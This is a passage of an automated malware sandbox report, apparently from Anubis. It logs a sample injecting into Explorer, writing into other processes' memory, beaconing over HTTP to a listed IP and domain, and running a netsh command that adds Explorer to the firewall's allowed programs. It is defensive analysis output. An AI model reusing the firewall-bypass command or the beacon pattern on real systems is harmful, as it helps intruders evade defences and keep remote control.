HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock	UseDelayedAcceptance	0	1

3.b) Explorer.EXE - File Activities

	- Files Created:

C:\DOCUME~1\user\LOCALS~1\Temp\BN1.tmp

	- Files Read:

PIPE\lsarpc

	- Files Modified:

C:\DOCUME~1\user\LOCALS~1\Temp\BN1.tmp

PIPE\lsarpc

\Device\Afd\Endpoint

\Device\NetBT_Tcpip_{B2B51064-BBF5-4528-B62B-E6D62A782874}

	- File System Control Communication:

File	Control Code	Times
PIPE\lsarpc	0x0011C017	3

	- Device Control Communication:

File	Control Code	Times
\Device\{B2B51064-BBF5-4528-B62B-E6D62A782874}	0x0017003E	76
unnamed file	0x00120003	1966
unnamed file	0x00120040	303
unnamed file	0x00120090	151
\Device\NetBT_Tcpip_{B2B51064-BBF5-4528-B62B-E6D62A782874}	0x0021009A	151
\Device\Afd\Endpoint	AFD_GET_INFO (0x0001207B)	2
\Device\Afd\Endpoint	AFD_SET_CONTEXT (0x00012047)	6
PhysicalDrive0	0x00074080	1
PhysicalDrive0	0x0007C088	1
\Device\Afd\Endpoint	AFD_BIND (0x00012003)	2
\Device\Afd\Endpoint	AFD_GET_TDI_HANDLES (0x00012037)	3
\Device\Afd\Endpoint	AFD_GET_SOCK_NAME (0x0001202F)	1
\Device\Afd\Endpoint	AFD_SEND_DATAGRAM (0x00012023)	1
\Device\Afd\Endpoint	AFD_CONNECT (0x00012007)	1
\Device\Afd\Endpoint	AFD_SEND (0x0001201F)	1
\Device\Afd\Endpoint	AFD_RECV (0x00012017)	32

	- Memory Mapped Files:

File Name

C:\DOCUME~1\user\LOCALS~1\Temp\BN1.tmp

C:\Documents and Settings\user\user.exe

C:\WINDOWS\System32\svchost.exe

C:\WINDOWS\System32\wshtcpip.dll

C:\WINDOWS\system32\hnetcfg.dll

C:\WINDOWS\system32\mswsock.dll

C:\WINDOWS\system32\netsh.exe

C:\Windows\AppPatch\sysmain.sdb

3.c) Explorer.EXE - Process Activities

	- Processes Created:

Executable	Command Line
C:\WINDOWS\system32\netsh.exe
C:\Documents and Settings\user\user.exe
	C:\Documents and Settings\user\user.exe /r
C:\DOCUME~1\user\LOCALS~1\Temp\BN1.tmp
	C:\DOCUME~1\user\LOCALS~1\Temp\BN1.tmp
C:\WINDOWS\System32\svchost.exe
	C:\WINDOWS\System32\svchost.exe

	- Remote Threads Created:

Affected Process

C:\WINDOWS\system32\netsh.exe

C:\Documents and Settings\user\user.exe

C:\DOCUME~1\user\LOCALS~1\Temp\BN1.tmp

C:\WINDOWS\System32\svchost.exe

	- Thread Overview:

Time	Number of threads
After 27 seconds	1
After 74 seconds	0

	- Foreign Memory Regions Read:

Process: C:\DOCUME~1\user\LOCALS~1\Temp\BN1.tmp

Process: C:\Documents and Settings\user\user.exe

Process: C:\WINDOWS\System32\svchost.exe

Process: C:\WINDOWS\system32\netsh.exe

	- Foreign Memory Regions Written:

Process: C:\DOCUME~1\user\LOCALS~1\Temp\BN1.tmp

Process: C:\Documents and Settings\user\user.exe

Process: C:\WINDOWS\System32\svchost.exe

Process: C:\WINDOWS\system32\netsh.exe

3.d) Explorer.EXE - Network Activity

	- HTTP Conversations:

From ANUBIS:1033 to 69.64.67.194:80 - [tsi45jc803o.com]
Request: GET /40E800144D513030303020312020202020202020202020206C0000006066000000007600000642EB000530999EFD49
Response: 200 "OK"

3.e) Explorer.EXE - Other Activities

	- Mutexes Created:

abcd

ajsdoasjdoasjdasoidjaosdjoasjdaosijdsad

	- Keyboard Keys Monitored:

Virtual Key Code	Times
VK_LBUTTON (1)	350
VK_CONTROL (17)	1

	- Windows SEH exceptions:

Description	Times
Exception 0xc0000005 (STATUS_ACCESS_VIOLATION) at 0x7c80be64	1

4. netsh.exe

	- General information about this executable

Analysis Reason:	Started by Explorer.EXE
Filename:	netsh.exe
MD5:	6309955f8a1bdd10a8467c50ed3f023e
SHA-1:	1bc8e086b5e5d62c9d4edff100bd563e3e990927
File Size:	86016 Bytes
Command Line:	netsh firewall set allowedprogram "C:\WINDOWS\Explorer.EXE" ENABLE
Process-status at analysis end:	alive
Exit Code:	0

	- Load-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\ntdll.dll	0x7C900000	0x000AF000
C:\WINDOWS\system32\kernel32.dll	0x7C800000	0x000F6000
C:\WINDOWS\system32\msvcrt.dll	0x77C10000	0x00058000
C:\WINDOWS\system32\ADVAPI32.dll	0x77DD0000	0x0009B000
C:\WINDOWS\system32\RPCRT4.dll	0x77E70000	0x00092000
C:\WINDOWS\system32\Secur32.dll	0x77FE0000	0x00011000
C:\WINDOWS\system32\MPRAPI.dll	0x76D40000	0x00018000
C:\WINDOWS\system32\ACTIVEDS.dll	0x77CC0000	0x00032000
C:\WINDOWS\system32\adsldpc.dll	0x76E10000	0x00025000
C:\WINDOWS\system32\NETAPI32.dll	0x5B860000	0x00055000
C:\WINDOWS\system32\USER32.dll	0x7E410000	0x00091000
C:\WINDOWS\system32\GDI32.dll	0x77F10000	0x00049000
C:\WINDOWS\system32\WLDAP32.dll	0x76F60000	0x0002C000
C:\WINDOWS\system32\ATL.DLL	0x76B20000	0x00011000
C:\WINDOWS\system32\ole32.dll	0x774E0000	0x0013D000
C:\WINDOWS\system32\OLEAUT32.dll	0x77120000	0x0008B000
C:\WINDOWS\system32\rtutils.dll	0x76E80000	0x0000E000
C:\WINDOWS\system32\SAMLIB.dll	0x71BF0000	0x00013000
C:\WINDOWS\system32\SETUPAPI.dll	0x77920000	0x000F3000
C:\WINDOWS\system32\RASAPI32.dll	0x76EE0000	0x0003C000
C:\WINDOWS\system32\rasman.dll	0x76E90000	0x00012000
C:\WINDOWS\system32\WS2_32.dll	0x71AB0000	0x00017000
C:\WINDOWS\system32\WS2HELP.dll	0x71AA0000	0x00008000
C:\WINDOWS\system32\TAPI32.dll	0x76EB0000	0x0002F000
C:\WINDOWS\system32\SHLWAPI.dll	0x77F60000	0x00076000
C:\WINDOWS\system32\WINMM.dll	0x76B40000	0x0002D000
C:\WINDOWS\system32\iphlpapi.dll	0x76D60000	0x00019000
C:\WINDOWS\system32\ShimEng.dll	0x5CB70000	0x00026000
C:\WINDOWS\AppPatch\AcGenral.DLL	0x6F880000	0x001CA000
C:\WINDOWS\system32\MSACM32.dll	0x77BE0000	0x00015000
C:\WINDOWS\system32\VERSION.dll	0x77C00000	0x00008000
C:\WINDOWS\system32\SHELL32.dll	0x7C9C0000	0x00817000
C:\WINDOWS\system32\USERENV.dll	0x769C0000	0x000B4000
C:\WINDOWS\system32\UxTheme.dll	0x5AD70000	0x00038000
C:\WINDOWS\system32\IMM32.DLL	0x76390000	0x0001D000
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll	0x773D0000	0x00103000
C:\WINDOWS\system32\comctl32.dll	0x5D090000	0x0009A000

	- Run-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\xpsp2res.dll	0x01820000	0x002C5000
C:\WINDOWS\system32\dot3api.dll	0x478C0000	0x0000A000
C:\WINDOWS\system32\FWCFG.DLL	0x4BCF0000	0x00011000
C:\WINDOWS\System32\qagent.dll	0x4DA60000	0x00028000
C:\WINDOWS\system32\NAPMONTR.DLL	0x5A900000	0x00032000
C:\WINDOWS\system32\RASMONTR.DLL	0x5DBA0000	0x00025000
C:\WINDOWS\system32\OneX.DLL	0x5DCA0000	0x00028000
C:\WINDOWS\system32\eappprxy.dll	0x5DCD0000	0x0000E000
C:\WINDOWS\system32\DOT3CFG.DLL	0x5EF50000	0x00011000
C:\WINDOWS\system32\IPPROMON.DLL	0x602B0000	0x00053000
C:\WINDOWS\system32\IPXPROMN.DLL	0x66170000	0x00014000
C:\WINDOWS\system32\IPXMONTR.DLL	0x66190000	0x00017000
C:\WINDOWS\system32\IPV6MON.DLL	0x661B0000	0x00012000
C:\WINDOWS\system32\IPMONTR.DLL	0x664E0000	0x0002A000
C:\WINDOWS\system32\IFMON.DLL	0x66DF0000	0x00024000
C:\WINDOWS\system32\HNETMON.DLL	0x68870000	0x00007000
C:\WINDOWS\System32\Wbem\framedyn.dll	0x692C0000	0x00030000
C:\WINDOWS\system32\DGNET.DLL	0x6D240000	0x00025000
C:\WINDOWS\system32\MSWSOCK.dll	0x71A50000	0x0003F000
C:\WINDOWS\system32\QUtil.dll	0x726C0000	0x00016000
C:\WINDOWS\system32\dot3dlg.dll	0x736D0000	0x00006000
C:\WINDOWS\system32\eappcfg.dll	0x745B0000	0x00022000
C:\WINDOWS\system32\MSCTF.dll	0x74720000	0x0004C000
C:\WINDOWS\system32\wbem\wbemsvc.dll	0x74ED0000	0x0000E000
C:\WINDOWS\system32\wbem\wbemprox.dll	0x74EF0000	0x00008000
C:\WINDOWS\system32\wbem\wbemcomn.dll	0x75290000	0x00037000
C:\WINDOWS\system32\netcfgx.dll	0x755F0000	0x0009A000
C:\WINDOWS\system32\wbem\fastprox.dll	0x75690000	0x00076000
C:\WINDOWS\system32\MSVCP60.dll	0x76080000	0x00065000
C:\WINDOWS\system32\WINSTA.dll	0x76360000	0x00010000
C:\WINDOWS\system32\netshell.dll	0x76400000	0x001A5000
C:\WINDOWS\system32\NTDSAPI.dll	0x767A0000	0x00013000
C:\WINDOWS\system32\credui.dll	0x76C00000	0x0002E000
C:\WINDOWS\system32\CLUSAPI.dll	0x76D10000	0x00012000
C:\WINDOWS\system32\DNSAPI.dll	0x76F20000	0x00027000
C:\WINDOWS\system32\WTSAPI32.dll	0x76F50000	0x00008000
C:\WINDOWS\system32\CLBCATQ.DLL	0x76FD0000	0x0007F000
C:\WINDOWS\system32\COMRes.dll	0x77050000	0x000C5000
C:\WINDOWS\system32\CRYPT32.dll	0x77A80000	0x00095000
C:\WINDOWS\system32\MSASN1.dll	0x77B20000	0x00012000

4.a) netsh.exe - Registry Activities

	- Registry Keys Created:

HKLM\Software\Microsoft\Tracing\FWCFG

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier

HKLM\System\CurrentControlSet\Services\NapAgent\LocalConfig\\Enroll

HKLM\System\CurrentControlSet\Services\NapAgent\LocalConfig\\Enroll\HcsGroups

HKLM\System\CurrentControlSet\Services\NapAgent\LocalConfig\\UI

	- Registry Values Modified:

Key	Name	New Value
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh	Active	1
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh	ControlFlags	1
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh	LogSessionName	stdout
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr	BitNames	NAP_TRACE_BASE NAP_TRACE_NETSH
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr	Guid	710adbf0-ce88-40b4-a50d-231ada6593f0
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil	Active	1
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil	ControlFlags	1
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil	LogSessionName	stdout
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier	BitNames	Error Unusual Info Debug
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier	Guid	8aefce96-4618-42ff-a057-3536aa78233e
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg	Active	1
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg	ControlFlags	1
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg	LogSessionName	stdout
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier	BitNames	Error Unusual Info Debug
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier	Guid	5f31090b-d990-4e91-b16d-46121d0255aa
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy	Active	1
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy	ControlFlags	1
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy	LogSessionName	stdout
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier	BitNames	Error Unusual Info Debug
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier	Guid	5f31090b-d990-4e91-b16d-46121d0255aa
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent	Active	1
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent	ControlFlags	1
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent	LogSessionName	stdout
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier	BitNames	Error Unusual Info Debug
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier	Guid	b0278a28-76f1-4e15-b1df-14b209a12613
HKLM\Software\Microsoft\Tracing\FWCFG	ConsoleTracingMask	4294901760
HKLM\Software\Microsoft\Tracing\FWCFG	EnableConsoleTracing	0
HKLM\Software\Microsoft\Tracing\FWCFG	EnableFileTracing	0
HKLM\Software\Microsoft\Tracing\FWCFG	FileDirectory	%windir%\tracing
HKLM\Software\Microsoft\Tracing\FWCFG	FileTracingMask	4294901760
HKLM\Software\Microsoft\Tracing\FWCFG	MaxFileSize	1048576

	- Registry Values Read:

Key	Name	Value	Times
HKLM\SOFTWARE\CLASSES\APPID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}	LocalService	winmgmt	1
HKLM\SOFTWARE\CLASSES\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\INPROCSERVER32		C:\WINDOWS\system32\wbem\wbemprox.dll	1
HKLM\SOFTWARE\CLASSES\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\INPROCSERVER32	ThreadingModel	Both	1
HKLM\SOFTWARE\CLASSES\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\INPROCSERVER32		C:\WINDOWS\system32\wbem\wbemsvc.dll	1
HKLM\SOFTWARE\CLASSES\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\INPROCSERVER32	ThreadingModel	Both	1
HKLM\SOFTWARE\CLASSES\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}	AppID	{8BC3F05E-D86B-11D0-A075-00C04FB68820}	1
HKLM\SOFTWARE\CLASSES\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\INPROCSERVER32		C:\WINDOWS\system32\wbem\fastprox.dll	1
HKLM\SOFTWARE\CLASSES\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\INPROCSERVER32	ThreadingModel	Both	1
HKLM\SOFTWARE\CLASSES\CLSID\{EA4A0A43-1C8F-4C7B-A4B1-28ECBD96BA8C}\INPROCSERVER32		%SystemRoot%\System32\qagent.dll	1
HKLM\SOFTWARE\CLASSES\CLSID\{EA4A0A43-1C8F-4C7B-A4B1-28ECBD96BA8C}\INPROCSERVER32	ThreadingModel	Apartment	1
HKLM\SOFTWARE\CLASSES\CLSID\{EB082BA1-DF8A-46BE-82F3-35BF9E9BE52F}\INPROCSERVER32		%SystemRoot%\System32\qagent.dll	1
HKLM\SOFTWARE\CLASSES\CLSID\{EB082BA1-DF8A-46BE-82F3-35BF9E9BE52F}\INPROCSERVER32	ThreadingModel	Apartment	1
HKLM\SOFTWARE\CLASSES\INTERFACE\{9556DC99-828C-11CF-A37E-00AA003240C7}\PROXYSTUBCLSID32		{D68AF00A-29CB-43FA-8504-CE99A996D9EA}	1
HKLM\SOFTWARE\CLASSES\INTERFACE\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\PROXYSTUBCLSID32		{7C857801-7381-11CF-884D-00AA004B2E24}	1
HKLM\SOFTWARE\CLASSES\INTERFACE\{F309AD18-D86A-11D0-A075-00C04FB68820}\PROXYSTUBCLSID32		{7C857801-7381-11CF-884D-00AA004B2E24}	1
HKLM\SOFTWARE\Microsoft\CTF\SystemShared\	CUAS	0	1
HKLM\SOFTWARE\Microsoft\Cryptography\Defaults\Provider\Gemplus GemSAFE Card CSP v1.0	Type	1	16
HKLM\SOFTWARE\Microsoft\Cryptography\Defaults\Provider\Infineon SICRYPT Base Smart Card CSP	Type	1	16
HKLM\SOFTWARE\Microsoft\Cryptography\Defaults\Provider\Microsoft Base Cryptographic Provider v1.0	Type	1	16
HKLM\SOFTWARE\Microsoft\Cryptography\Defaults\Provider\Microsoft Base DSS Cryptographic Provider	Type	3	16
HKLM\SOFTWARE\Microsoft\Cryptography\Defaults\Provider\Microsoft Base DSS and Diffie-Hellman Cryptographic Provider	Type	13	16
HKLM\SOFTWARE\Microsoft\Cryptography\Defaults\Provider\Microsoft Base Smart Card Crypto Provider	Type	1	16
HKLM\SOFTWARE\Microsoft\Cryptography\Defaults\Provider\Microsoft DH SChannel Cryptographic Provider	Type	18	16
HKLM\SOFTWARE\Microsoft\Cryptography\Defaults\Provider\Microsoft Enhanced Cryptographic Provider v1.0	Type	1	16
HKLM\SOFTWARE\Microsoft\Cryptography\Defaults\Provider\Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider	Type	13	16
HKLM\SOFTWARE\Microsoft\Cryptography\Defaults\Provider\Microsoft Enhanced RSA and AES Cryptographic Provider (Prototype)	Type	24	16
HKLM\SOFTWARE\Microsoft\Cryptography\Defaults\Provider\Microsoft Exchange Cryptographic Provider v1.0	Type	5	16
HKLM\SOFTWARE\Microsoft\Cryptography\Defaults\Provider\Microsoft RSA SChannel Cryptographic Provider	Type	12	16
HKLM\SOFTWARE\Microsoft\Cryptography\Defaults\Provider\Microsoft Strong Cryptographic Provider	Type	1	16
HKLM\SOFTWARE\Microsoft\Cryptography\Defaults\Provider\Schlumberger Cryptographic Service Provider	Type	1	16
HKLM\SOFTWARE\Microsoft\NetSh	1	ipmontr.dll	1
HKLM\SOFTWARE\Microsoft\NetSh	2	ifmon.dll	1
HKLM\SOFTWARE\Microsoft\NetSh	3	ippromon.dll	1
HKLM\SOFTWARE\Microsoft\NetSh	4	rasmontr.dll	1
HKLM\SOFTWARE\Microsoft\NetSh	5	ipxmontr.dll	1
HKLM\SOFTWARE\Microsoft\NetSh	6	ipxpromn.dll	1
HKLM\SOFTWARE\Microsoft\NetSh	FWCFG	fwcfg.dll	1
HKLM\SOFTWARE\Microsoft\NetSh	dgnet	dgnet.dll	1
HKLM\SOFTWARE\Microsoft\NetSh	dot3cfg	dot3cfg.dll	1
HKLM\SOFTWARE\Microsoft\NetSh	hnetmon	hnetmon.dll	1
HKLM\SOFTWARE\Microsoft\NetSh	ipv6mon	ipv6mon.dll	1
HKLM\SOFTWARE\Microsoft\NetSh	napmontr	napmontr.dll	1
HKLM\SOFTWARE\Microsoft\WBEM\CIMOM	Log File Max Size	65536	4
HKLM\SOFTWARE\Microsoft\WBEM\CIMOM	Logging	1	2
HKLM\SOFTWARE\Microsoft\WBEM\CIMOM	Logging Directory	C:\WINDOWS\system32\WBEM\Logs\	4
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion	CurrentBuildNumber	2600	1
HKLM\Software\Microsoft\COM3	Com+Enabled	1	2
HKLM\Software\Microsoft\COM3	REGDBVersion	0x0f00000000000000	12
HKLM\Software\Microsoft\Tracing	EnableConsoleTracing	0	1
HKLM\Software\Microsoft\Tracing\FWCFG	ConsoleTracingMask	4294901760	2
HKLM\Software\Microsoft\Tracing\FWCFG	EnableConsoleTracing	0	2
HKLM\Software\Microsoft\Tracing\FWCFG	EnableFileTracing	0	2
HKLM\Software\Microsoft\Tracing\FWCFG	FileDirectory	%windir%\tracing	4
HKLM\Software\Microsoft\Tracing\FWCFG	FileTracingMask	4294901760	2
HKLM\Software\Microsoft\Tracing\FWCFG	MaxFileSize	1048576	2
HKLM\Software\Microsoft\WBEM\CIMOM	Log File Max Size	65536	1
HKLM\Software\Microsoft\WBEM\CIMOM	Logging	1	1
HKLM\Software\Microsoft\WBEM\CIMOM	Logging Directory	C:\WINDOWS\system32\WBEM\Logs\	2
HKLM\Software\Microsoft\WBEM\CIMOM	ProcessID	860	1
HKLM\Software\Microsoft\WBEM\CIMOM	Repository Directory	%SystemRoot%\system32\WBEM\Repository	2
HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName	ComputerName	USER	3
HKLM\System\CurrentControlSet\Services\NapAgent\Qecs\79617	Description	Provides DHCP based enforcement for NAP	1
HKLM\System\CurrentControlSet\Services\NapAgent\Qecs\79617	Enabled	1	1
HKLM\System\CurrentControlSet\Services\NapAgent\Qecs\79617	Friendly Name	DHCP Quarantine Enforcement Client	1
HKLM\System\CurrentControlSet\Services\NapAgent\Qecs\79617	Vendor Name	Microsoft Corporation	1
HKLM\System\CurrentControlSet\Services\NapAgent\Qecs\79617	Version	1.0	1
HKLM\System\CurrentControlSet\Services\NapAgent\Qecs\79618	Description	Provides the quarantine enforcement for RAS Client	1
HKLM\System\CurrentControlSet\Services\NapAgent\Qecs\79618	Enabled	1	1
HKLM\System\CurrentControlSet\Services\NapAgent\Qecs\79618	Friendly Name	Remote Access Quarantine Enforcement Client	1
HKLM\System\CurrentControlSet\Services\NapAgent\Qecs\79618	Vendor Name	Microsoft Corporation	1
HKLM\System\CurrentControlSet\Services\NapAgent\Qecs\79618	Version	1.0	1
HKLM\System\CurrentControlSet\Services\NapAgent\Qecs\79619	Component Type	2	1
HKLM\System\CurrentControlSet\Services\NapAgent\Qecs\79619	Description	Provides IPSec based enforcement for Network Access Protection	1
HKLM\System\CurrentControlSet\Services\NapAgent\Qecs\79619	Enabled	1	1
HKLM\System\CurrentControlSet\Services\NapAgent\Qecs\79619	Friendly Name	IPSec Relying Party	1
HKLM\System\CurrentControlSet\Services\NapAgent\Qecs\79619	Vendor Name	Microsoft Corporation	1
HKLM\System\CurrentControlSet\Services\NapAgent\Qecs\79619	Version	1.0	1
HKLM\System\CurrentControlSet\Services\NapAgent\Qecs\79620	Description	Provides wireless Eapol based enforcement for NAP	1
HKLM\System\CurrentControlSet\Services\NapAgent\Qecs\79620	Enabled	1	1
HKLM\System\CurrentControlSet\Services\NapAgent\Qecs\79620	Friendly Name	Wireless Eapol Quarantine Enforcement Client	1
HKLM\System\CurrentControlSet\Services\NapAgent\Qecs\79620	Vendor Name	Microsoft Corporation	1
HKLM\System\CurrentControlSet\Services\NapAgent\Qecs\79620	Version	1.0	1
HKLM\System\CurrentControlSet\Services\NapAgent\Qecs\79621	Description	Provides TS Gateway enforcement for NAP	1
HKLM\System\CurrentControlSet\Services\NapAgent\Qecs\79621	Enabled	1	1
HKLM\System\CurrentControlSet\Services\NapAgent\Qecs\79621	Friendly Name	TS Gateway Quarantine Enforcement Client	1
HKLM\System\CurrentControlSet\Services\NapAgent\Qecs\79621	Vendor Name	Microsoft Corporation	1
HKLM\System\CurrentControlSet\Services\NapAgent\Qecs\79621	Version	1.0	1
HKLM\System\CurrentControlSet\Services\NapAgent\Qecs\79623	Description	Provides EAP based enforcement for NAP	1
HKLM\System\CurrentControlSet\Services\NapAgent\Qecs\79623	Enabled	1	1
HKLM\System\CurrentControlSet\Services\NapAgent\Qecs\79623	Friendly Name	EAP Quarantine Enforcement Client	1
HKLM\System\CurrentControlSet\Services\NapAgent\Qecs\79623	Vendor Name	Microsoft Corporation	1
HKLM\System\CurrentControlSet\Services\NapAgent\Qecs\79623	Version	1.0	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters	Domain		2
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters	Hostname	user	2
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters	UseDomainNameDevolution	1	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters	WinSock_Registry_Version	2.0	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5	Num_Catalog_Entries	3	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5	Serial_Access_Num	4	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	DisplayString	Tcpip	4
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	Enabled	1	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	LibraryPath	%SystemRoot%\System32\mswsock.dll	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	ProviderId	0x409d05229e7ecf11ae5a00aa00a7112b	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	StoresServiceClassInfo	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	SupportedNameSpace	12	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	Version	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	DisplayString	NTDS	4
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	Enabled	1	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	LibraryPath	%SystemRoot%\System32\winrnr.dll	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	ProviderId	0xee37263b80e5cf11a55500c04fd8d4ac	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	StoresServiceClassInfo	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	SupportedNameSpace	32	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	Version	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	DisplayString	Network Location Awareness (NLA) Namespace	4
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	Enabled	1	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	LibraryPath	%SystemRoot%\System32\mswsock.dll	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	ProviderId	0x3a244266a83ba64abaa52e0bd71fdd83	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	StoresServiceClassInfo	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	SupportedNameSpace	15	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	Version	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9	Next_Catalog_Entry_ID	1012	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9	Num_Catalog_Entries	11	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9	Serial_Access_Num	4	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004	PackedCatalogItem	%SystemRoot%\system32\rsvpsp.d	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005	PackedCatalogItem	%SystemRoot%\system32\rsvpsp.d	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
